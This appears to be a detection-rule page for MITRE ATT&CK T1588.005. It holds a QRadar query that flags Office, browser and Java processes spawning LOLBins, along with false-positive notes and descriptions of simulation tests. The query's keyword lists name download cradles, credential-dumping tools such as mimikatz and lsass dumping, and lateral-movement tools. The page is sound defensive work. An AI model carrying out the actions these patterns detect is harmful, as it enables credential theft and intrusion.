T1588.005 IBM QRadar · QRadar

Detect Exploits in IBM QRadar

Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find, modify, or purchase exploits from online sources, exploit vendors, criminal marketplaces (including exploit kits), or from other threat actors. Adversaries such as Ember Bear have obtained exploitation scripts against publicly-disclosed vulnerabilities from public repositories, while Kimsuky has obtained exploit code for various CVEs. Acquired exploits may be used across multiple phases of the adversary lifecycle including initial access, privilege escalation, defense evasion, credential access, and lateral movement. Because the acquisition of exploits occurs entirely on adversary-controlled infrastructure, direct detection is not possible from victim telemetry — detection must focus on observable indicators when those acquired exploits are deployed.

MITRE ATT&CK

Tactic
Resource Development
Technique
T1588 Obtain Capabilities
Sub-technique
T1588.005 Exploits
Canonical reference
https://attack.mitre.org/techniques/T1588/005/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
SELECT
  DATEFORMAT(starttime, 'yyyy-MM-dd HH:mm:ss') AS EventTime,
  LOGSOURCENAME(logsourceid) AS LogSource,
  devicehostname AS ComputerName,
  username AS UserName,
  "ParentImage" AS ExploitableParent,
  "ParentCommandLine" AS ParentCmdLine,
  "Image" AS SuspiciousChild,
  "CommandLine" AS ChildCmdLine,
  CASE WHEN "CommandLine" ILIKE '%http://%'
    OR "CommandLine" ILIKE '%https://%'
    OR "CommandLine" ILIKE '%ftp://%'
    OR "CommandLine" ILIKE '%invoke-webrequest%'
    OR "CommandLine" ILIKE '%net.webclient%'
    OR "CommandLine" ILIKE '%downloadstring%'
    OR "CommandLine" ILIKE '%downloadfile%'
    OR "CommandLine" ILIKE '%start-bitstransfer%'
    OR "CommandLine" ILIKE '%curl %'
    OR "CommandLine" ILIKE '%wget %'
  THEN 1 ELSE 0 END AS NetworkIndicator,
  CASE WHEN "CommandLine" ILIKE '%mimikatz%'
    OR "CommandLine" ILIKE '%sekurlsa%'
    OR "CommandLine" ILIKE '%lsass%'
    OR "CommandLine" ILIKE '%ntds%'
    OR "CommandLine" ILIKE '%procdump%'
    OR "CommandLine" ILIKE '%comsvcs%'
    OR "CommandLine" ILIKE '%minidump%'
    OR "CommandLine" ILIKE '%vaultcmd%'
  THEN 1 ELSE 0 END AS CredentialAccess,
  CASE WHEN "CommandLine" ILIKE '%schtasks%'
    OR "CommandLine" ILIKE '%reg add%'
    OR "CommandLine" ILIKE '%currentversion%run%'
    OR "CommandLine" ILIKE '%sc create%'
    OR "CommandLine" ILIKE '%sc config%'
    OR "CommandLine" ILIKE '%userinit%'
  THEN 1 ELSE 0 END AS PersistenceIndicator,
  CASE WHEN "CommandLine" ILIKE '%psexec%'
    OR "CommandLine" ILIKE '%wmiexec%'
    OR "CommandLine" ILIKE '%winrm%'
    OR "CommandLine" ILIKE '%net use%'
    OR "CommandLine" ILIKE '%enter-pssession%'
    OR "CommandLine" ILIKE '%invoke-command%'
  THEN 1 ELSE 0 END AS LateralMovement
FROM events
WHERE
  LOGSOURCETYPEID(logsourceid) = 396
  AND QIDNAME(qid) = 'Process Create'
  AND (
    "ParentImage" ILIKE '%\\winword.exe'
    OR "ParentImage" ILIKE '%\\excel.exe'
    OR "ParentImage" ILIKE '%\\powerpnt.exe'
    OR "ParentImage" ILIKE '%\\outlook.exe'
    OR "ParentImage" ILIKE '%\\mspub.exe'
    OR "ParentImage" ILIKE '%\\onenote.exe'
    OR "ParentImage" ILIKE '%\\msaccess.exe'
    OR "ParentImage" ILIKE '%\\acrord32.exe'
    OR "ParentImage" ILIKE '%\\acrobat.exe'
    OR "ParentImage" ILIKE '%\\chrome.exe'
    OR "ParentImage" ILIKE '%\\firefox.exe'
    OR "ParentImage" ILIKE '%\\msedge.exe'
    OR "ParentImage" ILIKE '%\\iexplore.exe'
    OR "ParentImage" ILIKE '%\\java.exe'
    OR "ParentImage" ILIKE '%\\javaw.exe'
    OR "ParentImage" ILIKE '%\\javaws.exe'
  )
  AND (
    "Image" ILIKE '%\\cmd.exe'
    OR "Image" ILIKE '%\\powershell.exe'
    OR "Image" ILIKE '%\\pwsh.exe'
    OR "Image" ILIKE '%\\wscript.exe'
    OR "Image" ILIKE '%\\cscript.exe'
    OR "Image" ILIKE '%\\mshta.exe'
    OR "Image" ILIKE '%\\rundll32.exe'
    OR "Image" ILIKE '%\\regsvr32.exe'
    OR "Image" ILIKE '%\\certutil.exe'
    OR "Image" ILIKE '%\\bitsadmin.exe'
    OR "Image" ILIKE '%\\msiexec.exe'
    OR "Image" ILIKE '%\\wmic.exe'
    OR "Image" ILIKE '%\\msbuild.exe'
    OR "Image" ILIKE '%\\installutil.exe'
    OR "Image" ILIKE '%\\regasm.exe'
    OR "Image" ILIKE '%\\regsvcs.exe'
    OR "Image" ILIKE '%\\schtasks.exe'
  )
  AND starttime > NOW() - 86400000
ORDER BY
  NetworkIndicator + CredentialAccess + PersistenceIndicator + LateralMovement DESC,
  starttime DESC
high severity medium confidence

Detects deployment of acquired exploits (T1588.005) in QRadar via Sysmon Process Create events (EventID 1, LOGSOURCETYPEID 396). Queries the custom event properties populated by the Microsoft Windows Sysmon DSM for ParentImage and Image path matching against known exploitable applications and suspicious LOLBins. Computed scoring fields (NetworkIndicator, CredentialAccess, PersistenceIndicator, LateralMovement) surface post-exploitation intent within the spawned child process command line. Events are ordered by cumulative score descending to surface highest-confidence exploit deployments first.

Data Sources

Microsoft Windows Sysmon via WinCollect or syslogQRadar DSM: Microsoft Windows (Sysmon EventID 1)

Required Tables

events (QRadar unified event store)LOGSOURCETYPEID 396 (Microsoft Windows Sysmon DSM)

False Positives & Tuning

  • IT operations teams using Office macros to automate PowerShell-based patching, inventory, or configuration management workflows on managed endpoints
  • PDF reader applications launching certutil.exe or msiexec.exe during plugin update installation or font package setup routines
  • Browser-integrated enterprise single sign-on (SSO) helpers launching wscript.exe or cscript.exe to handle VBScript-based NTLM authentication prompts
  • Automated testing frameworks (Selenium, Playwright headless) driven by chrome.exe or msedge.exe that spawn cmd.exe or PowerShell to execute test teardown scripts
  • Java-based build servers (Jenkins, TeamCity agents) using javaw.exe as the parent that legitimately invoke msbuild.exe or msiexec.exe during CI pipeline execution
Download portable Sigma rule (.yml)

Other platforms for T1588.005

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Simulate Document Exploit Process Chain (cmd Reconnaissance)

    Expected signal: Sysmon Event ID 1: Process Create with Image=cmd.exe. CommandLine contains 'whoami', 'hostname', 'ipconfig', 'net user'. Security Event ID 4688 (with command line auditing enabled) records the same. When run from a Word macro, InitiatingProcessFileName=winword.exe triggers the detection's parent-child matching logic.

  2. Test 2Simulate Browser Exploit Network Callback (Stage-2 Download Cradle)

    Expected signal: Sysmon Event ID 1: Process Create for powershell.exe with CommandLine containing 'Net.WebClient', 'DownloadString', and the target URL. Sysmon Event ID 3: Network Connection attempt to 192.0.2.1:4444 (TEST-NET-1 per RFC 5737 — safe non-routable address that generates telemetry without reaching any real host). PowerShell ScriptBlock Log Event ID 4104 captures the full script content.

  3. Test 3VBScript-Based Exploit Payload Simulation

    Expected signal: Sysmon Event ID 1 (x2): First for powershell.exe creating the VBS file, second for wscript.exe executing it. The char()-based obfuscation in the VBS content mimics obfuscation patterns used in real exploit-delivered payloads. Sysmon Event ID 11: File Create event for the VBS file dropped to TEMP. PowerShell ScriptBlock Log Event ID 4104 for the PowerShell wrapper.

  4. Test 4Exploit Guard ASR Rule Configuration Audit

    Expected signal: PowerShell ScriptBlock Log Event ID 4104 for the MpPreference query. Informational output to file showing which ASR rules are active. When ASR rules are in block mode and a real Office application attempts to spawn a child process (e.g., via a macro), Windows Defender Operational log generates Event ID 1121 (Blocked) or Event ID 1122 (Audit) with the rule GUID and process details.

  5. Test 5Simulate Post-Exploit Process Access (Sysmon Event ID 10)

    Expected signal: Sysmon Event ID 10 (ProcessAccess): SourceImage=powershell.exe, TargetImage=notepad.exe, GrantedAccess=0x0410 (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ). Sysmon Event ID 1: powershell.exe process create. The 0x0410 access mask is characteristic of credential dumping tools and shellcode injection staging — many SIEM rules alert on this mask from non-system processes targeting sensitive processes.

Last updated: 2026-04-13 Research depth: deep
References (10)

Unlock Pro Content

Get the full detection package for T1588.005 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1588Obtain Capabilities

Related Sub-techniques

T1588.001MalwareT1588.002ToolT1588.003Code Signing CertificatesT1588.004Digital CertificatesT1588.006VulnerabilitiesT1588.007Artificial Intelligence

Related Techniques

T1588Obtain CapabilitiesT1587.004ExploitsT1190Exploit Public-Facing ApplicationT1203Exploitation for Client ExecutionT1068Exploitation for Privilege EscalationT1211Exploitation for Defense EvasionT1212Exploitation for Credential AccessT1210Exploitation of Remote ServicesT1566PhishingT1204.002Malicious File

Same Tactic: Resource Development

Popular Detections